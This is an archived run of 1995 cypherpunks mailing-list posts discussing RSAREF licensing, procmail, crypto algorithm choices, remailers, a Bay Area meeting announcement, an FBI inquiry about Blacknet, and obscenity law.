In-Reply-To: <199501101810.KAA26946@largo.remailer.net>
Message-ID: <199501101821.NAA15802@hermes.bwh.harvard.edu>

It's just another example of RSADSI trying to act more like a government agency. :)

Adam

| I've been waiting for this, for oh, about two years now.
|
| Eric
| -----------------------------------------------------------------------------
|
| RSA Licenses Commercial Distribution Rights to RSAREF
| =====================================================

From adam at bwh.harvard.edu Tue Jan 10 10:23:52 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Tue, 10 Jan 95 10:23:52 PST
Subject: procmail: another question
In-Reply-To: <01HLOG4V1I1E00106V@TITAN.SFASU.EDU>
Message-ID: <199501101826.NAA15838@hermes.bwh.harvard.edu>

You wrote:

| Please excuse my ignorance, but will procmail run under DOS? Will it
| download mail from a PopMail server?

Procmail will run on the UNIX system that you connect to via pop. It processes mail, it doesn't transport it. (It can, of course, hand mail off to an MTA.)

Procmail is a very versatile, relatively easy to use way of processing mail.
Its most obvious function is to put mailing lists into one or several folders, but it also can be made into a file server*, automatically retrieve PGP keys, act as a basic remailer, etc, etc.

Adam

*RTFM: procmailex(5)

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From cactus at seabsd.hks.net Tue Jan 10 11:20:14 1995
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Tue, 10 Jan 95 11:20:14 PST
Subject: Storm Signals
Message-ID: <199501101924.OAA29627@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

On a social mailing list that I'm on, two things have been noticed in the last week:

1: Somebody's roommate (a Green Beret) has been called back into 6 months of active service. He was not told where he'd be.

2: GPS fine positioning has been turned off. This is only done during times of military operations (such as the 'invasion' of Haiti and the Iraq Massacre). It's also been highly correlated with Pentagon pizza deliveries.

Anybody else have any clues as to what's up?

No overt crypto relevance, but some parallels to traffic analysis could be easily drawn.

- - --
Todd Masco | "life without caution/ the only worth living / love for a man/
cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
From ChristopherA at consensus.com Tue Jan 10 11:25:32 1995
From: ChristopherA at consensus.com (Christopher Allen)
Date: Tue, 10 Jan 95 11:25:32 PST
Subject: RSA Licenses Commercial Distribution Rights to RSAREF (URLs to Press
Message-ID:

At 10:21 AM 1/10/95, Adam Shostack wrote:
> It's just another example of RSADSI trying to act more like a
>government agency. :)

I hope not -- one thing that I'm trying to do by taking over support for RSAREF is make it much more responsive to what developers demand. Like you I was disappointed by the slow progress of RSAREF, so that is why I worked so hard to get this deal going.

------------------------------------------------------------------------
...Christopher Allen Consensus Development Corporation..
... 4104-24th Street #419..
... San Francisco, CA 94114-3615..
... o415/647-6383 f415/647-6384..
...Mosaic/WWW Home Page: ..
...Consensus Home Page ..

From jamesd at netcom.com Tue Jan 10 11:27:40 1995
From: jamesd at netcom.com (James A. Donald)
Date: Tue, 10 Jan 95 11:27:40 PST
Subject: procmail: another question
In-Reply-To: <199501101826.NAA15838@hermes.bwh.harvard.edu>
Message-ID:

On Tue, 10 Jan 1995, Adam Shostack wrote:
> Procmail is a very versatile, relatively easy to use way of
> processing mail.

"Relatively easy" -- Relative to the usual venomous Unix user hostile interface that is. I use procmail, but my local Unix guru does not, even though he has a clear need to do so.

> Its most obvious function is to put mailing lists
> into one or several folders, but it also can be made into a file
> server*, automatically retrieve PGP keys, act as a basic remailer,
> etc, etc.

The .procmailrc file is in effect a program, rather than a bunch of flags.
Every time procmail receives a message it interpretively executes this program, which does a pattern match on the mail, if it gets a match, passes the mail to some external program, which may be yet another invocation of procmail executing a different .rc file.

Now if us windows folk had done it, we would have done it as visual basic controls and we would have created an installation program.

Still I must confess, we windows folk have not done it and the unix folk have done it, so I guess it is score 1 for unix, 0 for windows.

But I guarantee the chairman of the board is not going to use procmail.

---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are. True law derives from this right, not from         http://nw.com/jamesd/
the arbitrary power of the omnipotent state.            jamesd at netcom.com

From 71431.2564 at compuserve.com Tue Jan 10 11:40:48 1995
From: 71431.2564 at compuserve.com (Bradley W. Dolan)
Date: Tue, 10 Jan 95 11:40:48 PST
Subject: Why is WELL down?
Message-ID: <950110193426_71431.2564_FHJ103-1@CompuServe.COM>

My favorite net access provider, the WELL, is down and I can't get a straight answer from the normally frank WELL folks why.

Is there a net.guru out there that might have any insight into whether this shutdown is technical or political?

Brad Dolan

From jef at ee.lbl.gov Tue Jan 10 11:58:51 1995
From: jef at ee.lbl.gov (Jef Poskanzer)
Date: Tue, 10 Jan 95 11:58:51 PST
Subject: Why is WELL down?
Message-ID: <199501101958.LAA07295@hot.ee.lbl.gov>

>My favorite net access provider, the WELL, is down and I can't
>get a straight answer from the normally frank WELL folks why.

Is that sarcasm?

"Never attribute to malice what can be explained by simple stupidity."
---
Jef

From danisch at ira.uka.de Tue Jan 10 12:22:06 1995
From: danisch at ira.uka.de (Hadmut Danisch)
Date: Tue, 10 Jan 95 12:22:06 PST
Subject: "safe" Internet access
Message-ID: <9501102021.AA04063@elysion.iaks.ira.uka.de>

> If you want to access the Internet in a way that doesn't reveal your
> physical location (much), buy access from Metricom. They sell
> Internet access via radios. A small part-15 (900Mhz) $500 radio modem

This seems to be one of these devices which use the cellular phone network. In Germany they are also available ("Modacom") and use the D1/D2/E-Plus networks. These networks can localize a sender in many cases with a precision of about 20-40 meters. Not the best way to keep the physical location secret...

Hadmut

From adam at bwh.harvard.edu Tue Jan 10 12:25:13 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Tue, 10 Jan 95 12:25:13 PST
Subject: procmail: another question
In-Reply-To:
Message-ID: <199501102026.PAA16836@hermes.bwh.harvard.edu>

| On Tue, 10 Jan 1995, Adam Shostack wrote:
| > Procmail is a very versatile, relatively easy to use way of
| > processing mail.
|
| "Relatively easy" -- Relative to the usual venomous Unix
| user hostile interface that is. I use procmail, but my
| local Unix guru does not, even though he has a clear need to do so.

It's got a nasty learning curve; I held off for a long time before making the leap. What all mail filters need is better integration with MUAs, so I can say "This message should have gone into my cpunks-noise folder, fix the rules." Of course, doing that really well is not trivial.

Safe-tcl has a shorter learning curve, but I've spent enough time that I don't want to switch without a payoff.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From erc at s116.slcslip.indirect.com Tue Jan 10 13:07:42 1995
From: erc at s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Tue, 10 Jan 95 13:07:42 PST
Subject: "safe" Internet access
In-Reply-To:
Message-ID:

> Of course, part-time connectivity is problematic, because you need to
> receive mail at all times. Of course, you could use a mail hub in a
> "safe" country, but then you're tied to a government again.

If you batch your email and news using UUCP, you don't need to be connected all the time. And it can also be encrypted...

--
Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com
801/534-8857 voicemail 801/460-1883 digital pager
Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi
** PGP encrypted email preferred! **
"What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning"

From tcmay at netcom.com Tue Jan 10 13:18:28 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Tue, 10 Jan 95 13:18:28 PST
Subject: MEETING: Jan. 14th Bay Area Cypherpunks Meeting
Message-ID:

ANNOUNCEMENT
============

This month's Bay Area Cypherpunks Meeting will be held this Saturday, January 14th, from 12 noon until 6 pm in Silicon Graphics Cafe Iris, the usual place and time. Detailed directions are at the end of this message.

The topic: Demonstrations

The emphasis will be on hands-on, live demonstrations of items of interest. Several speakers will demonstrate products and tools on actual machines.

I encourage eating, shmoozing, and general milling-around to be finished by 12:30 at the latest, so we can start discussion of general items, updates, etc. I'd really like to get the demos started by 1 p.m., and 1:30 at the latest. We have a lot of demos planned and some special visitors in town this week, and some special events that just happened. So, as I'm the rotating chairentity this month, I'll wield the gavel ruthlessly.

The RSA Data Security Inc.
annual conference happened this past week, so I expect several folks will want to provide updates and news announcements, e.g., the licensing of RSAREF, status of lawsuits, new results, etc. Short updates are good, but we just don't have the time for this meeting to formally present recaps of interesting papers. If there were any *amazing* results, they'll surely keep for a future meeting for more detailed discussion (could be a theme for a meeting).

Also, Phil Zimmermann may be at the meeting (he's scheduled), so hearing from him could easily soak up a couple of hours, which we just don't have. In fairness to those who've planned demos, we'll have to try to limit all these interesting folks to the first hour or so. Maybe a few minutes more. And maybe later in the day there'll be time.

We have these demos planned.

* Henry Strickland (Strick) will, in his words, "be demoing Skronk (transparent above-the-kernel encryption for TCP/IP) and Kudzu (the TCL toolkit)."

* Jack Repenning of SGI will demo two interfaces. In his own words, "I'm planning to demo two interfaces, actually: the Emacs one (on an Indy), and the MCIP "MacPGP Kit" plus Eudora extensions, on a Mac."

* Phil Zimmermann "will demo pgp 2.9 and possibly voice pgp," according to Katy Kislitzin, who is in contact with Phil.

* Katy Kislitzin will bring up the "demo smosaic" she has. (Secure Mosaic.)

* Raph Levien will demonstrate "premail," his remailer-chaining tool.

* Other ad hoc demos of items of interest may happen. We'll have several machines set up, so those with interesting software or hardware can perhaps do some brief, unscheduled demos.

If I left anyone out, anyone who sent me e-mail saying they wanted to demo, I apologize. I went back over my mail and these were the folks I found who'd sent me e-mail. Contact me at my normal e-mail address (tcmay at netcom.com) as soon as possible if you want to be added.
(I'll be travelling to LA on Friday, for a television interview with the BBC on crypto, and so will be unwired that day.)

The emphasis is on hands-on demos, to expose folks to tools, capabilities, possible future products. Informality is fine.

NOTE TO PRESENTERS: Make arrangements to have machines you'll need there. An SGI Unix machine is permanently in the room. Other machines will have to be brought. Because of my trip to LA on Friday, I doubt I'll be bringing my PowerMac 7100AV with me, but I will have a PowerBook 170 laptop Macintosh, if all else fails. Windows and DOS demo folks should bring their machine of choice. (Atari, Cromemco, Amiga, Altair, and Exidy Sorcerer users are of course on their own.)

The overhead video system is often more trouble than it's worth, but it will be available for at least some of the demos. Those wishing to tie into should have either RGB outputs from their machine, or NTSC composite video. I'll bring my Hi-8 camcorder, which can tie in, and thus allow me to zoom in on whatever machines are there and display the video on the overhead screen.

Dinner plans will, as usual, be made in the last chaotic moments of the meeting.

-----------------------------------------------------------------------------
DIRECTIONS:

Silicon Graphics, Inc.
Building 5 (SGI Cafeteria)
2025 North Shoreline Boulevard
Mountain View, CA

From 101 take Shoreline East. This is towards Shoreline Amphitheatre. It's also "logical east", and points more north than east. (That is, it's east with respect to 101 North, which points west near the exit.) If you're coming in on 101 South, you'll cross over the bridge.

Continue on Shoreline and go past a whole bunch of other SGI buildings. Turn right onto Stierlin Court at the big red metal sculpture. There will be even more SGI buildings surrounding you--take note of the building numbers. Go almost to the end of this street. Building 5 is on the right.

From cactus at hks.net Tue Jan 10 13:34:06 1995
From: cactus at hks.net (L. Todd Masco)
Date: Tue, 10 Jan 95 13:34:06 PST
Subject: Crypto functions
Message-ID: <199501102139.QAA00961@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

What crypto functions are considered modern and usable? The list I have right now is:

RSA
IDEA
DES
3DES
RC4
RC5
BLOWFISH
MD4
MD5

(and FLAMINGO, a trivial test case, which consists of xor'ing every 8 chars with "flamingo".)

Pointers to code for any other schemes will be greatly appreciated.

Thanks,
-- Todd
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxL+YSoZzwIn1bdtAQGmbgF+Il9/8OU3smhe+DqhKBX5a51N9H15/ElN
4ByTAiKfNjXu21HWyV29kSxEBofo5003
=j55J
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Tue Jan 10 13:44:15 1995
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Tue, 10 Jan 95 13:44:15 PST
Subject: HTTP and ID Verification
Message-ID: <199501102149.QAA01058@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Doc writes:
> Can anyone tell me what the URL for the site that displays all
> the identifying info it gets when you request it is?

One option is http://www.uiuc.edu/cgi-bin/printenv
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxMAvioZzwIn1bdtAQGhxwF/VkjkXoQ/s6U85F90IqcUotmoHbCojLE9
Wmn+KPyoeIa6THpY/w3VGAV7ug5i5WZB
=PkPL
-----END PGP SIGNATURE-----

From perry at imsi.com Tue Jan 10 14:08:54 1995
From: perry at imsi.com (Perry E.
Metzger)
Date: Tue, 10 Jan 95 14:08:54 PST
Subject: Crypto functions
In-Reply-To: <199501102139.QAA00961@bb.hks.net>
Message-ID: <9501102208.AA26444@snark.imsi.com>

"L. Todd Masco" says:
> What crypto functions are considered modern and usable? The list I have
> right now is:
>
> RSA
> IDEA
> DES
> 3DES
> RC4
> RC5
> BLOWFISH
> MD4
> MD5

I wouldn't use BLOWFISH. MD4 is flawed -- and it's a hash function, not a crypto function (as is MD5). RC5 is very, very new. RC4 hasn't been well studied in the open literature yet, though it is quite promising.

.pm

From cactus at hks.net Tue Jan 10 14:25:43 1995
From: cactus at hks.net (L. Todd Masco)
Date: Tue, 10 Jan 95 14:25:43 PST
Subject: Crypto functions
Message-ID: <199501102230.RAA01492@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Well, by cryptographic I mean "interesting crypto-type functions," not necessarily just reversible mappings. As far as an encryption API is concerned, hash functions are no different: a byte stream comes in, a different byte stream comes out.

I ask because I'm starting to put together those GUCAPI functions I was talking about before the new year and defining the initial set of functions. L. McCarthy noted that I didn't include sapphire, and I've included it in the (trivially expandable) interface definition.

I'm more interested in being inclusive than in excluding cryptographically weak functions (and I don't feel that I'm qualified at this point to make the call between what's weak and strong anyway).
- - --
Todd Masco | "life without caution/ the only worth living / love for a man/
cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCUAwUBLxLPixNhgovrPB7dAQEWZgP3eLGNg+X5oxIySLFaTRaZN5eHgS402S39
/6FsB2eiUhy0j7OOrd3OiMorQSJ+V/8UvyJUayUYlWBoTgC/zJn8Vry4zX0HWhRh
URv5IT3l3Q/8kFCBkjRMSS/2b3ya0s2gFUJMzEYz78JNpLOwjtm59svdjydTE+z2
bboLSy+H1A==
=1noA
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxMKeCoZzwIn1bdtAQHtGAGAzxBCONKibbY5cvv/7a/POL5mqRjDfQ7B
c7S0z6EJMyGFsGeWJrOVlCgVum0TPrTE
=Rcku
-----END PGP SIGNATURE-----

From jalicqui at firefly.prairienet.org Tue Jan 10 14:44:56 1995
From: jalicqui at firefly.prairienet.org (Jeff A Licquia)
Date: Tue, 10 Jan 95 14:44:56 PST
Subject: MEETING: Jan. 14th Bay Area Cypherpunks Meeting
In-Reply-To:
Message-ID:

Ah, to be less locationally challenged! Anyone got a plane ticket they can donate? :-)

I (and, I imagine, others) would highly appreciate a summary from some worthy soul fortunate enough to be there.

----------------------------------------------------------------------
Jeff Licquia (lame .sig, huh?) | Finger for PGP 2.6 public key
jalicqui at prairienet.org | Me? Speak for whom? You've got
licquia at cei.com (work) | to be kidding!

From cactus at seabsd.hks.net Tue Jan 10 14:45:00 1995
From: cactus at seabsd.hks.net (L. Todd Masco)
Date: Tue, 10 Jan 95 14:45:00 PST
Subject: QUERY: S/Keyish PGP?
Message-ID: <199501102249.RAA01602@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

I'm catching up on old mail...
In response to my query, Adam Shostack wrote:
>
>| A quick question: Has anybody considered the possibility of hacking
>| something into PGP's password protection to allow an S/Key like access?
>
> I thought of this, bounced it off a few people, none of whom
>caught the flaw. When I got around to implementing it, I realized
>that for it to work, your key would have to be securely stored on your
>unix box without encryption.

I caught that. What I was hoping for was something that would allow a key to be used for a specific purpose once and only once by a given passphrase. Ideally, this could be done on a machine that was totally insecure.

I didn't catch the fundamental flaw, though. If the machine is compromised the key can always be compromised by taking an image of the previous state and replaying whatever passphrase was intercepted.

Bummer.
- - --
Todd Masco | "life without caution/ the only worth living / love for a man/
cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxLUPBNhgovrPB7dAQEn8gP8DrC3h9Dv21JGgg4Vsz/76gnUfnTJBPD+
PPyZ2gi2dzzQOVkYsxZBHQs7kRq6ZSANNbCfM5wY1GbBagZvv2gAPMx9bESudH+l
wtoFcZGH5Az85O+k6FhN/QsOjJq/PaHUbNMui1Q+QKrMqU4I/UGCJCxAVRP8/wfS
8rLKzm7TxTU=
=LxUH
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxMPACoZzwIn1bdtAQH7DAF9EMimhI0J9JUN9bqaHhsz2opQXZSIQC+g
D32kU3ELjC58Y4Ig3e9fLLrPoGtTub85
=Uq/c
-----END PGP SIGNATURE-----

From beattie at CSOS.ORST.EDU Tue Jan 10 14:49:59 1995
From: beattie at CSOS.ORST.EDU (Brian Beattie)
Date: Tue, 10 Jan 95 14:49:59 PST
Subject: Phil Zimmerman's Legal Defense Fund
Message-ID:

Could somebody mail me the info on sending a contribution to Phil Zimmerman's Legal fees related to the PGP issue?

Brian Beattie | [From an MIT job ad] "Applicants must also have
 | extensive knowledge of UNIX, although they should
beattie at csos.orst.edu | have sufficiently good programming taste to not
Fax (503)754-3406 | consider this an achievement."

From root at einstein.ssz.com Tue Jan 10 15:47:47 1995
From: root at einstein.ssz.com (root)
Date: Tue, 10 Jan 95 15:47:47 PST
Subject: Pornography, What is it?
In-Reply-To: <9501101603.AA02337@eitech.eit.com>
Message-ID: <199501102342.RAA00418@einstein.ssz.com>

> >>
> >If this is so then everything I have read or seen misses this minor point
> >completely. Every press release, speech, etc. that I see uses the term
> >pornography, not obscenity. TV preachers, news anchors, newspapers, DA's,
> >etc. consistently use the term pornography. The state of Oregon specifically
> >legalized pornography, not obscenity.
> >I think from a legal standpoint there is little difference between the two.
>
> Not so. Obscenity is a class of speech which is completely unprotected
> by the First Amendment [*Note, I don't agree with this line of reasoning,
> but it's what the Supremes say.] I.e. you can simply ban obscenity,
> like child pornography. Pornographic material cannot be banned but
> can be regulated according to 'time place and manner'. Hence the
> zoning restrictions on Adult book stores.
>
I understand what you are saying, what I am saying is the distinction is not used in practice. The bbs operator in Cali.
that was busted in Tennessee was busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14 year old's account being operated by an oinkdroid.)

If you can 'simply' ban obscenity then why all the ruckus? Simple, you can't ban it simply... or any other way for that matter. As to your zoning restrictions, they change from place to place and hence are not a hard and fast rule either. The bottom line is that the distinction fostered by legal eagles is a straw man argument, it is intended to distract from the real issue - freedom to do what you want unless you harm another or their property without their prior consent.

> From a legal perspective, the difference between pornography and
> obscenity is defined by the Miller test. [This may have changed
> a bit in the past few years]. This states that in order for
> material to be obscene it must be:
>
> 1. Devoid of any artistic or literary importance.
> 2. Appeal to a prurient interest. [i.e. be arousing].
> 3. Be patently offensive by contemporary community standards.
>
> This isn't the exact wording, but it's the general idea.
>
This test is a joke, if you apply it fairly then a man and his wife having anal sex would qualify as obscene in many places (which it does in some states). Also, the whole concept of community standards is unworkable. Whose community? The reason so few people get busted under the Miller test is that there really are so few idiots out there who would fall for it.

> In practice, it's very hard to get anything declared obscene,
> hence the desire to regulate pornography strongly within the
> permitted bounds of the First Amendment.
>
The reason they want to regulate pornography is that it is a stepping stone to a total ban. It is based on religious grounds and the issue really has little if anything to do with Constitutional rights.
> -Ekr
>

From yusuf921 at uidaho.edu Tue Jan 10 17:04:20 1995
From: yusuf921 at uidaho.edu (Syed Yusuf)
Date: Tue, 10 Jan 95 17:04:20 PST
Subject: FBI and BLACKNET
Message-ID:

I was just visited by a humble servant of the FBI inquiring what I knew of BLACKNET. They apparently believe it's a possible network industrial sabotage (read Terrorism).

Although the person I spoke to was quite cordial and even bought me lunch (that's the way to win me over) I must really question the intelligence (read IQ) and intelligence (read reconnaissance) of his superiors. Apparently whoever sent him his lead doesn't pay attention to the net enough to know Blacknet was a hoax, and why did it take since August for them to find me?

I explained to him the difference between a Cypherpunk and a hacker, explained what a joke it is to be prosecuting Mr. Zimmerman and why the Government is in the wrong for trying to limit encryption strength. Then I demonstrated the Internet and how to e-mail the prez and FTP speeches of the Prez :)

(I know I know, act stupid so they volunteer as much info as possible, he let too many things slip, but still if I had his job I'd be following up things like this too)

--Syed Yusuf (Cypherpunk and proud of it damnit!)

From rogaski at phobos.lib.iup.edu Tue Jan 10 17:10:14 1995
From: rogaski at phobos.lib.iup.edu (Mark Rogaski)
Date: Tue, 10 Jan 95 17:10:14 PST
Subject: Returned mail: User unknown (fwd)
Message-ID: <199501110109.UAA03229@phobos.lib.iup.edu>

-----BEGIN PGP SIGNED MESSAGE-----

- From the node of anonymous-remailer at shell.portal.com:
:
: I want to propose that a change to more of a Snow Crash society
: with anarcho-capitalism as the norm is not necessarily being
: _caused_ by pressures listed above, but, rather, fit a grander
: historical destiny. What we are seeing and will see in the
:

Not necessarily to the EXTREME that Stephenson predicted, but I definitely see a lot of what he said already starting to happen. Hell, look at the Burbclaves.
Lil' old Indiana, PA had their first drive-by shooting a few months ago. Some of the growing gang-warfare influence is starting to spill over from Pittsburgh. Once people get a little more frightened of violence, the engineered community idea is going to explode. Now take that with private and corporate police forces and ... BINGO! Snowcrash.

: Consider the possibility that the dissolution of large,
: centralized federal republics is also inevitable. (The
: Frissel/Sandforth Optimists have been arguing this exact point.)
:

The decentralizing effect of digital networks (or Webs a la Hakim Bey) is pretty self evident. One can easily extrapolate the effects of a structure like the Internet, a structure that by nature routes around any form of 'censorship' from above.

- -----
Doc
doc at phobos.lib.iup.edu
aka Mark Rogaski
http://www.lib.iup.edu/~rogaski/

Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer...

[finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLxMZ/R0c4/pqJauBAQH8LwP+PrvNhKJVEzmhZVcuvkNMLmGWWgyflAlh
PxvR5BtJHBpE/oNqB3TVOywt9eJYeIV7L7BSboIFosEyqC4OEFS6WRTAJpWhPg8L
L9CdvhaDKubnTteBEtugEtU1HB3iJ+zRucJYUVit0bBwCimcqvr/aTMab7h4Yqw9
uKJPulSTg/w=
=jdlE
-----END PGP SIGNATURE-----

-----
Doc
doc at phobos.lib.iup.edu
aka Mark Rogaski
http://www.lib.iup.edu/~rogaski/

Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer...

[finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]

From s675570 at aix1.uottawa.ca Tue Jan 10 18:52:33 1995
From: s675570 at aix1.uottawa.ca (Angus Patterson)
Date: Tue, 10 Jan 95 18:52:33 PST
Subject: Why use plastic for remailers and DH?
Message-ID:

This point may have been raised before, but anyway, unless you're using a swiss-bank issued credit card for a numbered account (if that's at all possible), or a bogus name on the card, why would anybody want to use something as completely traceable as a credit card to pay for a remailer or a data haven?

From jbotz at orixa.mtholyoke.edu Tue Jan 10 19:08:46 1995
From: jbotz at orixa.mtholyoke.edu (Jurgen Botz)
Date: Tue, 10 Jan 95 19:08:46 PST
Subject: Remailer postage
In-Reply-To: <199501051802.NAA22909@seminole.gate.net>
Message-ID: <199501110308.WAA07340@orixa.mtholyoke.edu>

jpb at gate.net wrote:
> Where can I get the Magic Money software?

I'm a bit behind, so sorry if others have already suggested this, but you should need any digicash for this... stamps can be just big random numbers. Someone buys a book of stamps, you make 10 big random numbers, send them a copy and keep a copy on file. After a message comes through with a particular number you throw that number out. Just like real stamps, and unlike money, they can be used only once.

From John.Schofield at sprawl.expressnet.org Tue Jan 10 21:18:55 1995
From: John.Schofield at sprawl.expressnet.org (John Schofield)
Date: Tue, 10 Jan 95 21:18:55 PST
Subject: Keep Out Electronic Availability Announcement
Message-ID: <4bc_9501101432@expressnet.org>

-----BEGIN PGP SIGNED MESSAGE-----

Keep Out
The Journal of Electronic Privacy
January 10, 1995

** Keep Out Volume 1, Number 2 now available electronically **
** Keep Out Volume 2, Number 1 coming soon **
** FREE sample issues available **

I am pleased to announce the electronic availability of Volume 1, Number 2 of Keep Out, the Journal of Electronic Privacy. To receive a copy, simply send e-mail to keep-out-current at expressnet.org. The subject and body of the message do not matter. You will receive an ASCII-text copy of the issue in reply to your message.
You can also do a Fidonet file request to 1:102/903 and request VOL1-NO2.TXT, or call the Sprawl BBS at +1-818-342-5127 and download it.

Volume 1, Number 2 had stories on the Pretty Good Privacy (PGP) signature bug, a how-to story on anonymous remailers, an interview with remailer operator Erich von Hollander, and of course, a continuation of our PGP beginners' series with an introduction to digital signatures and the web of trust.

While Keep Out is primarily a paper magazine, the text of each issue is released electronically to make sure the information is disseminated widely. This information is too important to limit it to those who can afford a subscription.

I am sending this message instead of posting the full text of Keep Out because the electronic edition contains the same commercial advertisements that the paper version does. It would be inappropriate to post it here.

To encourage people to subscribe, and to ensure that Keep Out remains solvent, the electronic edition is released roughly one month after the paper version.

It seems to be the lot of new magazines to have deadline troubles. Keep Out has unfortunately been no exception. The second issue of Keep Out was released quite late. To bring the magazine's date of issue back in touch with reality, the next issue (Volume 2, Number 1) will be dated March/April, and will be released in paper form on February 27.

For that issue, we are working on a review of steganography software (programs for hiding data in sound and picture files), an in-depth report on Tempest technology (which allows an eavesdropper to view your computer screen from a distance without using wires), a story telling the current state of the government's Clipper (wiretap) Chip initiative, and a continuation of our PGP for beginners' series.

To receive a free, sample issue of Keep Out, with no strings attached, simply send your postal address to one of the addresses below. You will receive a copy of the next issue when it is mailed out.
Keep Out's mailing list is completely confidential. No information about you will be released for any reason, except for court orders, of course.

Subscriptions to Keep Out are $15 a year for six issues in the U.S. and Canada, $27 elsewhere. Back issues of the first two issues (Volume 1, Numbers 1 and 2) are available at $7 each inside the U.S. and Canada, $9 elsewhere. U.S. funds only, please. Unfortunately, we can not accept credit cards, but checks and money orders payable to "Keep Out" are welcome.

_______________
Contact Methods

Voice: +1-818-345-8640
Fax/BBS: +1-818-342-5127
Internet: keep.out at sprawl.expressnet.org
Fidonet: "Keep Out" at 1:102/903.0
Snail Mail: Keep Out
            P.O. Box 571312
            Tarzana, CA 91357-1312
            USA

-----BEGIN PGP SIGNATURE-----
Version: 2.7
Comment: Call 818-345-8640 voice for info on Keep Out magazine.

iQCVAwUBLxL5+Wj9fvT+ukJdAQEeMgP8DG/x1JtkES7yEXyW67xOXiC/GPSn29ru
eeBgjp7Otqc4HVH46fJBe14zoSAfkgVuQUesOxtsVBUAVT6MS/SICr/i+Wrig6lS
k2LbokBD9GIihRVDG20XSkqfo3Uw7GBevFEJClCR7T5+rglnbVP8j+bXhumXBtAv
y8wU0yYwaD8=
=jZNP
-----END PGP SIGNATURE-----

... "Happiness is a warm puppy," said the anaconda.
--- Blue Wave/RA v2.12
--
|Fidonet: John Schofield 11:310/12
|Internet: John.Schofield at sprawl.expressnet.org
|
| Standard disclaimer: The views of this user are strictly his own.

From cheap_anonymous at crl.com Tue Jan 10 21:39:56 1995
From: cheap_anonymous at crl.com (cheap_anonymous at crl.com)
Date: Tue, 10 Jan 95 21:39:56 PST
Subject: Jay Leno
Message-ID: <199501110448.XAA04663@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Tonight on the Tonight Show with Jay Leno, Leno said: "...why is O.J. writing a book? If he's so eager to tell his experiences, whisper it to Connie Chung."

Thought it might be mildly humorous for those of us who read Tim's message about Connie.
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxNjBioZzwIn1bdtAQGEzQF/XkfPjWrW2kbgpYLB6Gf1EiNXEJTwKW1l
mtuAnfhbSHsXPDIvv4IzGoAof2qlsd2v
=66P/
-----END PGP SIGNATURE-----

From root at einstein.ssz.com Tue Jan 10 21:41:34 1995
From: root at einstein.ssz.com (root)
Date: Tue, 10 Jan 95 21:41:34 PST
Subject: Pornography, What is it?
In-Reply-To: <9501102357.AA12620@eitech.eit.com>
Message-ID: <199501110033.SAA00514@einstein.ssz.com>

>
> You seem to have missed where I say that I don't agree with this
> line of reasoning. I tend to believe that the first amendment means
> what it says. (I.e. make no law.) But the fact of the matter is that
> the people who make the law think differently, right or wrong.
>
I understand, I just don't think most of the folks out there against porno are interested in constitutional rights. They don't see them as relevant to their day to day lives. You might call it a sort of cult of personality which is using religion as the head.

Also, the 1st Amendment says that Congress shall make no law, it doesn't say a damn thing about the states doing it. When I read this amendment what I see is the founding fathers saying it is up to each state to decide for themselves.

And since Congress is placed in charge of inter-state relations it is quite simple to reduce this to mean that States may not apply their standards to other states because they would then be acting in the place of the federal government.

> >I understand what you are saying, what I am saying is the distinction is not
> >used in practice. The bbs operator in Cali. that was busted in Tennessee was
> >busted for delivering PORNOGRAPHY (not obscenity) to a minor (in short a 14
